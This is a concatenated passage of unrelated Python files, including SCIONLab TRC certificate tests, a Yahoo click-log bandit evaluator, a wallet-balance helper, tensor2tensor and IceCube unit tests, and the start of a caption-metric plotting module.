    def predicted_classification(self, predicted_classification):
        """Sets the predicted_classification of this Document.

        :param predicted_classification: The predicted_classification of this Document.
        :type predicted_classification: PredictedClassification
        """
        self._predicted_classification = predicted_classification

    @property
    def text_contents(self):
        """Gets the text_contents of this Document.

        list of textContent object representing the content of the document  # noqa: E501

        :return: The text_contents of this Document.
        :rtype: List[TextContent]
        """
        return self._text_contents

    @text_contents.setter
    def text_contents(self, text_contents):
        """Sets the text_contents of this Document.

        list of textContent object representing the content of the document  # noqa: E501

        :param text_contents: The text_contents of this Document.
        :type text_contents: List[TextContent]
        """
        # Required field in the API spec: reject explicit None.
        if text_contents is None:
            raise ValueError("Invalid value for `text_contents`, must not be `None`")  # noqa: E501

        self._text_contents = text_contents
|
# Copyright 2020 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timedelta
from django.db import transaction
from django.test import TestCase
from scionlab.scion import as_ids, certs, trcs, pkicommand
from scionlab.models.core import ISD, AS
from scionlab.models.pki import Key, Certificate
from scionlab.models.trc import TRC, _coreas_certificates
# SCION AS identifiers shared by the test cases in this module.
# NOTE(review): not referenced in the visible tests; presumably used by
# helpers/tests further down the file -- confirm before removing.
_ASID_1 = 'ff00:0:1'
_ASID_2 = 'ff00:0:2'
_ASID_3 = 'ff00:0:3'
class TRCTests(TestCase):
    """Tests for TRC predecessor lookup and voter-index computation.

    Relies on module-level helpers (_create_TRC, _create_AS,
    _get_voters_indices) defined elsewhere in this file.
    """

    def setUp(self):
        self.isd1 = ISD.objects.create(isd_id=1, label='Test')

    def test_get_previous(self):
        trc1 = _create_TRC(self.isd1, 1, 1)
        # A base TRC (serial == base) is its own predecessor.
        self.assertEqual(trc1.predecessor_trc_or_none(), trc1)
        trc2 = _create_TRC(self.isd1, 2, 1)
        self.assertEqual(trc2.predecessor_trc_or_none(), trc1)
        # Serial 4 has no serial-3 predecessor, so lookup yields None.
        trc4 = _create_TRC(self.isd1, 4, 1)
        self.assertIsNone(trc4.predecessor_trc_or_none())

    def test_get_voters_indices(self):
        as110 = _create_AS(self.isd1, 'ff00:0:110', is_core=True)
        Key.objects.create_core_keys(as110)
        Certificate.objects.create_core_certs(as110)
        prev = _create_TRC(self.isd1, 1, 1)
        # Five regular voting certs; their position in ``prev`` defines
        # the index each vote must refer to.
        c0 = Certificate.objects.create_voting_regular_cert(as110)
        c1 = Certificate.objects.create_voting_regular_cert(as110)
        c2 = Certificate.objects.create_voting_regular_cert(as110)
        c3 = Certificate.objects.create_voting_regular_cert(as110)
        c4 = Certificate.objects.create_voting_regular_cert(as110)
        prev.certificates.add(c0, c1, c2, c3, c4)
        prev.save()
        trc = _create_TRC(self.isd1, 2, 1)
        trc.certificates.add(c0, c1, c2, c3, c4)
        trc.votes.add(c1)
        self.assertEqual(_get_voters_indices(trc), [1])
        trc.votes.add(c4)
        self.assertEqual(_get_voters_indices(trc), [1, 4])
        # insert votes in a different order; indices must stay sorted by
        # certificate position, not insertion order
        trc.votes.clear()
        trc.votes.add(c3)
        trc.votes.add(c4)
        trc.votes.add(c1)
        self.assertEqual(_get_voters_indices(trc), [1, 3, 4])

    def test_certificates_indices_after_delete(self):
        as110 = _create_AS(self.isd1, 'ff00:0:110', is_core=True)
        as210 = _create_AS(self.isd1, 'ff00:0:210', is_core=True)
        Key.objects.create_core_keys(as110)
        Key.objects.create_core_keys(as210)
        Certificate.objects.create_core_certs(as110)
        Certificate.objects.create_core_certs(as210)
        prev = _create_TRC(self.isd1, 1, 1)
        c0 = Certificate.objects.create_voting_sensitive_cert(as110)
        c1 = Certificate.objects.create_voting_regular_cert(as110)
        c2 = Certificate.objects.create_issuer_root_cert(as110)
        c3 = Certificate.objects.create_voting_sensitive_cert(as210)
        c4 = Certificate.objects.create_voting_regular_cert(as210)
        c5 = Certificate.objects.create_issuer_root_cert(as210)
        prev.certificates.add(c0, c1, c2, c3, c4, c5)
        prev.save()
        trc = _create_TRC(self.isd1, 2, 1)
        trc.certificates.add(c0, c1, c2, c3, c4)
        trc.votes.add(c0, c1, c3, c4)
        trc.save()
        self.assertEqual(_get_voters_indices(trc), [0, 1, 3, 4])  # normal
        # Certificates referenced by a TRC must refuse deletion so voter
        # indices remain stable.
        for c in [c0, c1, c2, c3, c4, c5]:
            with transaction.atomic():  # transaction of the test would be broken otherwise
                self.assertRaises(RuntimeError, c.delete)
        # and the indices of the voters never changed
        self.assertEqual(_get_voters_indices(trc), [0, 1, 3, 4])
        prev.delete()
        c5.delete()  # does not raise exception, not part of a TRC anymore
class TRCUpdateTests(TestCase):
    """Tests for the conditions under which a TRC regular update is allowed."""

    def setUp(self):
        self.isd1 = ISD.objects.create(isd_id=1, label='Test')

    def test_update_regular_possible(self):
        """Walk through every condition that can forbid a regular TRC update."""
        trc1 = _create_TRC(self.isd1, 1, 1)
        self.assertIsNotNone(trc1.check_regular_update_error())  # no previous TRC
        self.assertIn('no previous', trc1.check_regular_update_error())
        as1 = _create_AS(self.isd1, 'ff00:0:110', is_core=True)
        Key.objects.create_core_keys(as1)
        Certificate.objects.create_core_certs(as1)
        self._reset_core_ases(trc1)
        # Identical core section and quorum: regular update is allowed.
        trc2 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=2)
        trc2.save()
        self._reset_core_ases(trc2)
        self.assertIsNone(trc2.check_regular_update_error())
        # create new voter
        as2 = _create_AS(self.isd1, 'ff00:0:210', is_core=True)
        Key.objects.create_core_keys(as2)
        Certificate.objects.create_core_certs(as2)
        self._reset_core_ases(trc2)
        self.assertIsNotNone(trc2.check_regular_update_error())  # quorum changed
        self.assertIn('quorum', trc2.check_regular_update_error())
        trc2.quorum = trc1.quorum  # force quorum to be the same
        trc2.save()
        # Even with the quorum forced back, the core section itself differs.
        self.assertIsNotNone(trc2.check_regular_update_error())  # core section changed
        self.assertIn('core section', trc2.check_regular_update_error())
        trc2.quorum += 1  # reinstate the correct quorum
        trc2.save()
        # sanity check
        trc3 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=3)
        trc3.save()
        self._reset_core_ases(trc3)
        self.assertIsNone(trc3.check_regular_update_error())
        # change sensitive voting cert (only the cert suffices)
        Certificate.objects.create_voting_sensitive_cert(as1)
        trc4 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=4)
        trc4.save()
        self._reset_core_ases(trc4)
        self.assertIsNotNone(trc4.check_regular_update_error())  # sensitive voting different
        self.assertIn('sensitive vote', trc4.check_regular_update_error())
        # sanity check
        trc5 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=5)
        trc5.save()
        self._reset_core_ases(trc5)
        self.assertIsNone(trc5.check_regular_update_error())
        # change number of included certificates
        trc6 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=6)
        trc6.save()
        self._reset_core_ases(trc6)
        trc6.certificates.remove(trc6.certificates.filter(key__usage=Key.ISSUING_ROOT).last())
        self.assertIsNotNone(trc6.check_regular_update_error())
        self.assertIn('different number', trc6.check_regular_update_error())
        # change regular voting certificate, not part of voters
        self._reset_core_ases(trc6)
        trc7 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=7)
        trc7.save()
        self._reset_core_ases(trc7)
        self.assertIsNone(trc7.check_regular_update_error())
        # Swap a regular voting cert for a fresh one of the same AS.
        cert = trc7.certificates.filter(key__usage=Key.TRC_VOTING_REGULAR).last()
        trc7.certificates.remove(cert)
        as_ = cert.key.AS
        trc7.certificates.add(Certificate.objects.create_voting_regular_cert(as_))
        trc7.save()
        self.assertIsNotNone(trc7.check_regular_update_error())
        self.assertIn('regular voting certificate', trc7.check_regular_update_error())
        self.assertIn('not part of voters', trc7.check_regular_update_error())
        # change regular voting certificate, make it part of voters
        trc7.votes.add(cert)
        self.assertIsNone(trc7.check_regular_update_error())
        # change root certificate, not part of voters
        trc8 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
                   base_version=1, serial_version=8)
        trc8.save()
        self._reset_core_ases(trc8)
        self.assertIsNone(trc8.check_regular_update_error())
        cert = trc8.certificates.filter(key__usage=Key.ISSUING_ROOT).last()
        trc8.certificates.remove(cert)
        as_ = cert.key.AS
        cert = Certificate.objects.create_issuer_root_cert(as_)
        trc8.certificates.add(cert)
        trc8.save()
        self.assertIsNotNone(trc8.check_regular_update_error())
        self.assertIn('root certificate', trc8.check_regular_update_error())
        self.assertIn('not sign', trc8.check_regular_update_error())
        # change root certificate, make it part of voters
        trc8.signatures.add(cert)
        self.assertIsNone(trc8.check_regular_update_error())

    def _reset_core_ases(self, trc):
        """Point *trc* at all current core ASes of its ISD and recompute the quorum."""
        trc.core_ases.clear()
        trc.core_ases.set(trc.isd.ases.filter(is_core=True))
        # Majority quorum over the core ASes.
        trc.quorum = trc.core_ases.count() // 2 + 1
        # insert all core AS certificates:
        trc.certificates.clear()
        trc.certificates.add(*_coreas_certificates(trc.isd))
        trc.save()
class TRCCreationTests(TestCase):
    """Tests for TRC creation via the manager: base, regular and sensitive updates."""

    def setUp(self):
        self.isd1 = ISD.objects.create(isd_id=1, label='Test')

    def test_create_empty(self):
        """Creating a TRC in an ISD without core ASes must fail."""
        self.assertRaises(Exception,  # no core ases
                          TRC.objects.create,
                          isd=self.isd1)

    def test_create_first(self):
        """The first TRC of an ISD is a base TRC with no votes."""
        self._create_ases()
        trc = TRC.objects.create(self.isd1)
        _check_trc(trc, trc)
        self.assertEqual(trc.serial_version, trc.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), trc)
        self.assertFalse(trc.votes.exists())
        # 2 core ASes -> majority quorum of 2.
        self.assertEqual(trc.quorum, 2)

    def test_create_regular_update(self):
        """A second TRC with unchanged core section is a regular update."""
        self._create_ases()
        prev = TRC.objects.create(self.isd1)
        trc = TRC.objects.create(self.isd1)
        _check_trc(trc, prev)
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, prev.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), prev)
        self.assertTrue(trc.votes.exists())
        self.assertEqual(trc.quorum, prev.quorum)

    def test_create_sensitive_update(self):
        """Adding a core AS forces a sensitive (but still non-base) update."""
        self._create_ases()
        prev = TRC.objects.create(self.isd1)
        # add another core AS. This forces a sensitive update.
        as4 = _create_AS(self.isd1, 'ff00:0:4', is_core=True)
        Key.objects.create_all_keys(as4)
        Certificate.objects.create_all_certs(as4)
        trc = TRC.objects.create(self.isd1)
        _check_trc(trc, prev)
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, prev.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), prev)
        self.assertTrue(trc.votes.exists())
        # NOTE(review): quorum stays equal here although a core AS was added —
        # presumably 3 cores still round to the same majority; confirm.
        self.assertEqual(trc.quorum, prev.quorum)

    def test_delete_one_core_as(self):
        """Removing a core AS triggers a TRC update and regenerates CP AS certs."""
        self._create_ases()
        prev = TRC.objects.create(self.isd1)
        # remove one core AS
        AS.objects.filter(is_core=True, isd=self.isd1).first().delete()
        # deleting a core As triggers a generation of a TRC. Get that TRC:
        trc = TRC.objects.latest()
        # check the trc chain
        _check_trc(trc, prev)
        # check it's a sensitive update
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, prev.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), prev)
        self.assertTrue(trc.votes.exists())
        self.assertNotEqual(trc.quorum, prev.quorum)
        # Check valid latest CP AS certificates regenerated, core
        some_core = AS.objects.filter(is_core=True, isd=self.isd1).first()
        cert_cp_as = some_core.certificates_latest().filter(key__usage=Key.CP_AS).first()
        loaded_chain = cert_cp_as.format_certfile()
        certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
        some_core.validate_crypto()
        # Check valid latest CP AS certificates regenerated, non-core
        any_none_core = AS.objects.filter(is_core=False, isd=self.isd1).first()
        cert_cp_as = any_none_core.certificates_latest().filter(key__usage=Key.CP_AS).first()
        loaded_chain = cert_cp_as.format_certfile()
        certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
        any_none_core.validate_crypto()

    def test_broken_delete_one_core_as(self):
        # [regression test] Check that validating an invalid / old certificate fails
        # against an updated TRC
        self._create_ases()
        prev = TRC.objects.create(self.isd1)
        # remove one core AS
        AS.objects.filter(is_core=True, isd=self.isd1).first().delete()
        # deleting a core As triggers a generation of a TRC. Get that TRC:
        trc = TRC.objects.latest()
        # check the trc chain
        _check_trc(trc, prev)
        # check it's a sensitive update
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, prev.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), prev)
        self.assertTrue(trc.votes.exists())
        self.assertNotEqual(trc.quorum, prev.quorum)
        # Check invalid CP AS certificates when selecting old certificate, core
        with self.assertRaises(pkicommand.ScionPkiError):
            some_core = AS.objects.filter(is_core=True, isd=self.isd1).first()
            cert_cp_as = Certificate.objects.filter(key__AS=some_core, key__usage=Key.CP_AS,
                                                    key__version=1).get()
            loaded_chain = cert_cp_as.format_certfile()
            certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
        # Check invalid CP AS certificates when randomly selecting, non-core
        with self.assertRaises(AttributeError):
            any_none_core = AS.objects.filter(is_core=False, isd=self.isd1).first()
            cert_cp_as = Certificate.objects.filter(key__AS=any_none_core, key__usage=Key.CP_AS,
                                                    key__version=1).get()
            loaded_chain = cert_cp_as.format_certfile()
            # We should never get further, Unreachable code
            # The first core AS was deleted and the non-core v1 CP AS cert was referring to
            # that core AS CA cert
            certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))

    def test_create_less_core_ases(self):
        """Shrinking the core set to one AS still produces a verifiable update."""
        self._create_ases()
        prev = TRC.objects.create(self.isd1)
        # leave only one core AS
        AS.objects.exclude(pk=AS.objects.filter(is_core=True).first().pk).delete()
        # deleting core ASes triggers a generation of a TRC. Get that TRC:
        trc = TRC.objects.latest()
        # check it's a sensitive update
        _check_trc(trc, prev)
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, prev.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), prev)
        self.assertTrue(trc.votes.exists())
        self.assertNotEqual(trc.quorum, prev.quorum)

    def _create_ases(self):
        """Create two core ASes and one non-core AS, each with full keys and certs."""
        as1 = _create_AS(self.isd1, 'ff00:0:1', is_core=True)
        as2 = _create_AS(self.isd1, 'ff00:0:2', is_core=True)
        as3 = _create_AS(self.isd1, 'ff00:0:3', is_core=False)
        Key.objects.create_all_keys(as1)
        Key.objects.create_all_keys(as2)
        Key.objects.create_all_keys(as3)
        Certificate.objects.create_all_certs(as1)
        Certificate.objects.create_all_certs(as2)
        Certificate.objects.create_all_certs(as3)
class WithExpiredCertsTests(TestCase):
    """TRC creation when the underlying crypto material is expired or disjoint in time."""

    def setUp(self):
        self.isd1 = ISD.objects.create(isd_id=1, label='Test')
        self.as1 = _create_AS(self.isd1, 'ff00:0:1', is_core=True)

    def test_create_with_expired_crypto_material(self):
        # have the certificates expire before voting and signing.
        not_before = datetime.utcnow() - timedelta(days=1)
        not_after = not_before + timedelta(seconds=3600)
        Key.objects.create_all_keys(self.as1, not_before, not_after)
        Certificate.objects.create_all_certs(self.as1)
        prev = TRC.objects.create(self.isd1)
        # add another core AS.
        as2 = _create_AS(self.isd1, 'ff00:0:2', is_core=True)
        Key.objects.create_all_keys(as2, not_before, not_after)
        Certificate.objects.create_all_certs(as2)
        trc = TRC.objects.create(self.isd1)
        # despite being created with currently expired material, all is good:
        _check_trc(trc, prev)
        # and check this is just an update
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, prev.base_version)
        self.assertEqual(trc.predecessor_trc_or_none(), prev)
        self.assertTrue(trc.votes.exists())

    def test_create_with_not_overlapping_crypto_material(self):
        # create a prev. TRC and update it with a TRC whose validity doesn't overlap with prev.
        not_before = datetime.utcnow()
        not_after = not_before + timedelta(days=1)
        Key.objects.create_core_keys(self.as1, not_before, not_after)
        Certificate.objects.create_core_certs(self.as1)
        prev = TRC.objects.create(self.isd1)
        # add another core AS.
        as2 = _create_AS(self.isd1, 'ff00:0:2', is_core=True)
        # New validity window starts just after the previous one ends.
        not_before = not_after + timedelta(microseconds=100)
        not_after = not_before + timedelta(days=1)
        Key.objects.create_core_keys(as2, not_before=not_before, not_after=not_after)
        Certificate.objects.create_core_certs(as2)
        # and refresh the crypto material of as1
        Key.objects.create_core_keys(self.as1, not_before, not_after)
        Certificate.objects.create_core_certs(self.as1)
        trc = TRC.objects.create(self.isd1)
        # we should get a base TRC
        _check_trc(trc, trc)
        self.assertEqual(trc.serial_version, prev.serial_version + 1)
        self.assertEqual(trc.base_version, trc.serial_version)
        self.assertEqual(trc.predecessor_trc_or_none(), trc)
        self.assertFalse(trc.votes.exists())
class WithNewCoreASesTests(TestCase):
    """TRC updates when the whole core AS population is replaced."""

    def test_delete_all_core_ases(self):
        isd1 = ISD.objects.create(isd_id=1, label='Test')
        as1 = _create_AS(isd1, 'ff00:0:1', is_core=True)
        as1.update_keys_certs()
        trc1 = TRC.objects.create(isd1)
        self.assertIsNotNone(trc1)
        self.assertEqual(trc1.base_version, trc1.serial_version)  # base TRC
        _check_trc(trc1, trc1)
        # delete all ASes in the ISD, and then create new ones with different ID
        AS.objects.filter(isd=isd1).delete()
        as2 = _create_AS(isd1, 'ff00:0:2', is_core=True)
        as2.update_keys_certs()
        trc2 = TRC.objects.create(isd1)
        self.assertIsNotNone(trc2)
        self.assertEqual(trc2.serial_version, trc1.serial_version + 1)
        self.assertEqual(trc2.base_version, trc1.base_version)  # just an update
        _check_trc(trc2, trc1)  # sufficient to verify votes and signatures
def _create_AS(isd, as_id, is_core=False):
    """Create and persist an AS in *isd*, without any keys or certificates."""
    new_as = AS(isd=isd, as_id=as_id, as_id_int=as_ids.parse(as_id), is_core=is_core)
    new_as.save()
    return new_as
def _create_TRC(isd, serial, base):
    """Persist a bare TRC row directly, bypassing the TRCManager create methods."""
    new_trc = TRC(isd=isd,
                  not_before=datetime.utcnow(),
                  not_after=datetime.utcnow(),
                  base_version=base,
                  serial_version=serial)
    new_trc.save()
    return new_trc
def _get_voters_indices(trc):
    """Map trc.votes to certificate indices in the previous TRC (None for a base TRC)."""
    predecessor = trc.predecessor_trc_or_none()
    if predecessor is None:
        return None
    return predecessor.get_certificate_indices(trc.votes.all())
def _check_trc(trc, anchor):
    """Verify *trc* against the *anchor* TRC; raises on any verification error."""
    decoded_anchor = trcs.decode_trc(anchor.trc)
    decoded_subject = trcs.decode_trc(trc.trc)
    trcs.verify_trcs(decoded_anchor, decoded_subject)
|
#!/usr/bin/env python2.7
import sys
import gzip
import hideSomePolicyLinUCB as policy # This is your policy file.
# This script loads a subset of the original yahoo data (e.g. 1 day of log data, which corresponds to 4.5 million log files)
def read_articles(path):
    """Load the article feature file and register it with the policy module.

    Each line has the form "<article_id> <feature_1> ... <feature_k>".
    """
    articles = {}
    # open() instead of the Python-2-only file() builtin (removed in Python 3;
    # open() behaves identically here on both versions).
    with open(path) as inf:
        for line in inf:
            tokens = line.strip().split()
            articles[int(tokens[0])] = [float(x) for x in tokens[1:]]
    policy.set_articles(articles)
def process(path):
    # Replay a gzipped Yahoo click log through the policy module and report
    # the click-through rate (CTR) over the lines where the policy's
    # recommendation matched the logged article (off-policy evaluation).
    # NOTE: Python 2 script (print statements).
    clicked, lines_evaluated, lines_total = 0, 0, 0
    with gzip.open(path, 'rb') as inf:
        for line in inf:
            lines_total += 1
            # Parsing the log line.
            logline = line.strip().split()
            chosen = int(logline.pop(1))
            user_action = int(logline.pop(1))
            time = int(logline[0])
            # Article 109528 is skipped entirely — presumably a known bad
            # entry in this data set; TODO confirm.
            if chosen == 109528:
                continue
            # Six user features in "index:value" form with 1-based indices.
            user_features = [None]*6
            for feat in logline[2:8]:
                user_features[int(feat[0])-1] = float(feat[2:])
            # Tokens starting with '|' name the candidate article pool.
            articles = []
            for feat in logline[8:]:
                if feat[0] == '|':
                    article_id = int(feat[1:])
                    if article_id != 109528:
                        articles.append(article_id)
            # Getting the recommended article.
            calculated = policy.reccomend(time, user_features, articles)
            if not calculated in articles:
                raise Exception("Article was not in the list.")
            # Updating the policy. Only matching lines count toward the CTR.
            if calculated == chosen:
                policy.update(user_action)
                clicked += user_action
                lines_evaluated += 1
            else:
                policy.update(-1)
            if lines_total % 10000 == 0:
                # NOTE(review): divides by lines_evaluated — raises
                # ZeroDivisionError if no line matched in the first 10000.
                print "Evaluated %d/%d lines.\tCTR = %f\t%f%% done" % (lines_evaluated, lines_total, float(clicked) / lines_evaluated, 100.0/4680000.0*lines_total)
    print "Evaluated %d/%d lines." % ( lines_evaluated, lines_total)
    print "CTR=%f" % (float(clicked) / lines_evaluated)
if __name__ == "__main__":
    # Usage: ./evaluator.py <articles-file> <gzipped-log-file>
    if len(sys.argv) != 3:
        print "Usage: ./evaluator.py articles log"
        sys.exit(-1)
    read_articles(sys.argv[1])
    process(sys.argv[2])
|
"""
used to check the wallet information of any wallet id.
This class can be used to get a wallet balance
"""
import time
class WalletInfo:
    """Read-only helpers for querying wallet balances and BCW reservation state.

    All methods are static and take an ``admin_inst`` that exposes a
    ``get_db_manager()`` accessor.
    """

    @staticmethod
    def get_wallet_balance_info(admin_inst, wallet_id):
        """
        Sent to a client requesting a balance.

        :param admin_inst: admin object exposing the db manager
        :param wallet_id: id of the wallet being queried
        :return: [confirmed balance, pending transactions dict]
        """
        # confirmed balance layout: [available tokens, reserved tokens, total tokens]
        confirmed = admin_inst.get_db_manager().get_from_wallet_balances_db(wallet_id=wallet_id)
        # pending layout: {tx_hash: [tx_type, "sender"/"receiver", main_tx, sig, fee,
        #                            amt_tokens (negative for sender, positive for receiver)]}
        pending = WalletInfo.get_pending_transactions(admin_inst=admin_inst, wallet_id=wallet_id)
        return [confirmed, pending]

    @staticmethod
    def get_pending_transactions(admin_inst, wallet_id):
        """Return the wallet's unconfirmed transactions keyed by tx hash."""
        return admin_inst.get_db_manager().get_from_unconfirmed_db_wid(wallet_id=wallet_id)

    @staticmethod
    def get_lesser_of_wallet_balance(admin_inst, wallet_id):
        """
        Internal helper returning the more conservative of the two balances:
        the confirmed (on-chain) balance, or confirmed plus pending deltas.

        :param admin_inst: admin object exposing the db manager
        :param wallet_id: id of the wallet being queried
        :return: the lesser of confirmed and pending balance
        """
        confirmed_info, pending_txs = WalletInfo.get_wallet_balance_info(admin_inst, wallet_id)
        available = confirmed_info[0]  # only the available portion counts
        # Sum token amount + fee per pending tx; both are negative for a
        # sender and positive for a receiver.
        delta = sum(entry[-1] + entry[-2] for entry in pending_txs.values())
        return min(available, available + delta)

    @staticmethod
    def get_wallet_bcw_info(admin_inst, wallet_id):
        """Return the BCW db entry for the wallet:
        [hash of rsv_req tx, rsv req dict, signature, amount reserved, reservation expiry timestamp].
        """
        return admin_inst.get_db_manager().get_from_bcw_db(wallet_id=wallet_id)

    @staticmethod
    def get_if_wallet_a_bcw(admin_inst, wallet_id):
        """
        Check whether the wallet is a blockchain connected wallet (BCW).

        :return: True if a BCW entry exists, False otherwise
        """
        return bool(WalletInfo.get_wallet_bcw_info(admin_inst=admin_inst, wallet_id=wallet_id))

    @staticmethod
    def check_remaining_reservation_time(admin_inst, wallet_id):
        """
        :param admin_inst: admin object exposing the db manager
        :param wallet_id: id of the wallet being queried
        :return: int remaining reservation seconds, or None if the wallet is not a BCW
        """
        bcw_entry = WalletInfo.get_wallet_bcw_info(admin_inst, wallet_id)
        if not bcw_entry:
            return None
        # last element is the reservation expiry timestamp
        return bcw_entry[-1] - int(time.time())
|
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for subword_text_encoder_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.data_generators.ops import subword_text_encoder_ops
import tensorflow as tf
# Path to the test subword vocabulary fixture used by the encoder op tests.
vocab_file = (
    "third_party/py/tensor2tensor/data_generators/ops/testdata/subwords")
class SubwordTextEncoderOpsTest(tf.test.TestCase):
    """Tests for the subword_text_encoder_encode op."""

    def test_subword_text_encoder_encode(self):
        """Encoding a known sentence yields the expected subword ids."""
        sentence = "the quick brown fox jumps over the lazy dog"
        ids = subword_text_encoder_ops.subword_text_encoder_encode(sentence,
                                                                   vocab_file)
        self.assertAllEqual(ids, [2, 3, 4, 5, 6, 7, 8, 9, 2, 11, 12, 1])
if __name__ == "__main__":
    # The op under test requires eager mode (TF 1.x API).
    tf.enable_eager_execution()
    tf.test.main()
|
#!/usr/bin/env python
import unittest
from icecube import dataclasses
from icecube import icetray
from icecube.icetray import OMKey
class TestI3FlasherInfo(unittest.TestCase):
    """Equality semantics of dataclasses.I3FlasherInfo."""

    @staticmethod
    def _make_info(om_key):
        """Build an I3FlasherInfo with fixed field values and the given flashing OM."""
        info = dataclasses.I3FlasherInfo()
        info.flashing_om = om_key
        info.flash_time = 1.0
        info.atwd_bin_size = 1.0
        info.led_brightness = 1
        info.mask = 1
        info.width = 1
        info.rate = 1
        info.raw_atwd3 = [1, 2, 3]
        return info

    def test_I3FlasherInfo_equality(self):
        # Two objects with identical fields compare equal.
        first = self._make_info(OMKey(2, 1, 0))
        second = self._make_info(OMKey(2, 1, 0))
        self.assertTrue(first == second, "this should be true.")

    def test_I3FlasherInfo_inequality(self):
        # A differing flashing_om makes the objects unequal.
        first = self._make_info(OMKey(3, 1, 0))
        second = self._make_info(OMKey(2, 1, 0))
        self.assertFalse(first == second, "this should be false.")
unittest.main()
|
from matplotlib import pyplot as plt
import json
import pandas as pd
from shapely.geometry.point import Point
from shapely import affinity
from matplotlib.patches import Polygon
import random
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import pairwise_distances_argmin_min
def shapely_ellipse(center, dims, scale, angle):
    """Build a shapely ellipse: unit circle -> stretch to dims -> rotate -> rescale."""
    unit_circle = Point(center).buffer(1)
    stretched = affinity.scale(unit_circle, dims[0], dims[1])
    rotated = affinity.rotate(stretched, angle)
    return affinity.scale(rotated, scale[0], scale[1])
def create_elipse(x, y, ax, color, n_std):
    """Draw a covariance ellipse for the points (x, y) on *ax*.

    Returns the shapely ellipse object and the added matplotlib patch.
    """
    cov = np.cov(x, y)
    # Pearson correlation determines the ellipse's axis ratio.
    pearson = cov[0, 1] / np.sqrt(cov[0, 0] * cov[1, 1])
    width = np.sqrt(1 + pearson)
    height = np.sqrt(1 - pearson)
    center = (np.mean(x), np.mean(y))
    # Scale each axis by its standard deviation times the requested multiple.
    scales = (np.sqrt(cov[0, 0]) * n_std, np.sqrt(cov[1, 1]) * n_std)
    ellipse_obj = shapely_ellipse(center, (width, height), scales, 45)
    boundary = np.array(ellipse_obj.exterior.coords.xy)
    patch = Polygon(boundary.T, facecolor=color, edgecolor='black', alpha=0.15)
    return ellipse_obj, ax.add_patch(patch)
def estimate_center(x_all, y_all):
    """Return the sample closest to the KMeans centroid of the (x_all, y_all) cloud.

    :param x_all: 1-d numpy array of x coordinates
    :param y_all: 1-d numpy array of y coordinates
    :return: (x, y, index) of the closest actual data point
    """
    X = np.concatenate((x_all.reshape(-1, 1), y_all.reshape(-1, 1)), axis=1)
    # A single cluster: its centroid is just the mean of the cloud.
    km = KMeans(n_clusters=1).fit(X)
    closest, _ = pairwise_distances_argmin_min(km.cluster_centers_, X)
    idx = closest[0]
    # Index directly instead of the original list(...).pop(idx), which copied
    # the whole array into a list just to read one element.
    return x_all[idx], y_all[idx], idx
def get_inter(e1, e2):
    """Fraction of e2's area covered by its intersection with e1."""
    overlap = e1.intersection(e2)
    return overlap.area / e2.area
##########################################################################################
class smurf_system_analysis():
    """Analysis and plotting of SMURF metric scores (SPARCS/SPURTS/MIMA) for
    several captioning systems whose scores are interleaved in one file:
    entries i, i+n_systems, i+2*n_systems, ... belong to system i.
    """

    def __init__(self, n_systems=4, ref_system=0, in_file='results/smurf_scores.json'):
        """
        :param n_systems: number of systems interleaved in the score file
        :param ref_system: index of the reference system for intersection reports
        :param in_file: path to the json file with the raw metric scores
        """
        self.n_systems = n_systems
        self.ref_system = ref_system
        self.in_file = in_file

    def load_standardized_scores(self, estimates_file='smurf/standardize_estimates.txt'):
        """Standardize the raw scores with the (mean, std) estimates file.

        The estimates file has one row per metric: name, mean, std.
        """
        # Bug fix: the input file handle was previously never closed.
        with open(self.in_file, "r") as stand_in:
            metric_scores = json.load(stand_in)
        estimates = pd.read_csv(estimates_file, header=None)
        sem_ind = list(estimates[0]).index('SPARCS')
        qual_ind = list(estimates[0]).index('SPURTS')
        gram_ind = list(estimates[0]).index('MIMA')
